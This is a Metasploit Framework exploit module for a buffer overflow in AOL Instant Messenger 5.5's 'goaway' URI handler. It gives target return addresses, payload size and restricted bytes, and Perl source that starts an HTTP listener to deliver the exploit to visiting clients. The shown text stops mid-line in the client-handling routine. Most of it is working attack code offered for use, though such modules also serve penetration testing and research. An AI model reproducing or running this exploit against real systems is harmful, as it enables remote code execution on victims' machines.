Name: AOL Instant Messenger goaway Overflow 
Version: 1.4 
Targeting: win32, win2000, winxp, win2003 / x86 
Privileges: No 
Authors: 
skape <mmiller [at] hick.org> 
thief <thief [at] uninformed.org> 
 
Targets: 
0 - Automatic 
1 - Windows XP SP0 
 
Options: 
HTTPHOST - The local HTTP listener host 
HTTPPORT - The local HTTP listener port 
 
Payload Info: 
Room for 1014 bytes of payload 
Restricted bytes: 0x00 0x09 0x0a 0x0d 0x20 0x22 0x25 0x26 0x27 0x2b 0x2f 0x3a 0x3c 0x3e 0x3f 0x40  
 
Description: This module exploits a flaw in the handling of AOL Instant Messenger's 'goaway' URI handler. An attacker can execute arbitrary code by supplying a overly sized buffer as the 'message' parameter. This issue is known to affect AOL Instant Messenger 5.5. 
References:   
http://www.osvdb.org/8398 
http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities 
 
exploits:
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##package Msf::Exploit::aim_goaway;
use strict;
use base "Msf::Exploit";
use Pex::Text;
use IO::Socket::INET;
my $advanced =
{
};
my $info =
{
	'Name'           => 'AOL Instant Messenger goaway Overflow',
	'Version'        => '$Revision: 1.4 $',
	'Authors'        => 
		[
			'skape <mmiller [at] hick.org>',
			'thief <thief [at] uninformed.org>'
		],
	'Description'    => 
		Pex::Text::Freeform(qq{
			This module exploits a flaw in the handling of AOL Instant
			Messenger's 'goaway' URI handler.  An attacker can execute 
			arbitrary code by supplying a overly sized buffer as the 
			'message' parameter.  This issue is known to affect AOL Instant 
			Messenger 5.5.
		}),
	'Arch'           => [ 'x86' ],
	'OS'             => [ 'win32', 'win2000', 'winxp', 'win2003' ],
	'Priv'           => 0,
	'UserOpts'       => 
		{
			'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
			'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
		},
	'Payload'        => 
		{
			'Space'    => 1014,
			'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
			'MaxNops'  => 1014, 
			'Keys'     => [ '-ws2ord' ],
		},
	'Refs'           => 
		[
			[ 'OSVDB', 8398 ],
			'http://www.idefense.com/application/poi/display?id=121&type=vulnerabilities',
		],
	'DefaultTarget'  => 0,
	'Targets'        =>
		[
			[ 'Automatic',      0x1108118f ], # proto.ocm
			[ "Windows XP SP0", 0x71aa2461 ], # ws2help.dll
		],
	'Keys'           => [ 'aim' ],
};
sub new
{
	my $class = shift;
	my $self;
	
	$self = $class->SUPER::new(
			{ 
				'Info'     => $info,
				'Advanced' => $advanced,
			},
			@_);
	return $self;
}
sub Exploit
{
	my $self = shift;
	my $server     = IO::Socket::INET->new(
			LocalHost => $self->GetVar('HTTPHOST'),
			LocalPort => $self->GetVar('HTTPPORT'),
			ReuseAddr => 1,
			Listen    => 1,
			Proto     => 'tcp');
	my $client;
	# Did the listener create fail?
	if (not defined($server))
	{
		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
		return;
	}
	$self->PrintLine("[*] Waiting for connections to http://" . $self->GetVar('HTTPHOST') . ":" . $self->GetVar('HTTPPORT') . " ...");
	while (defined($client = $server->accept()))
	{
		$self->HandleHttpClient(fd => $client);
	}
	return;
}
sub HandleHttpClient
{
	my $self = shift;
	my ($fd) = @{{@_}}{qw/fd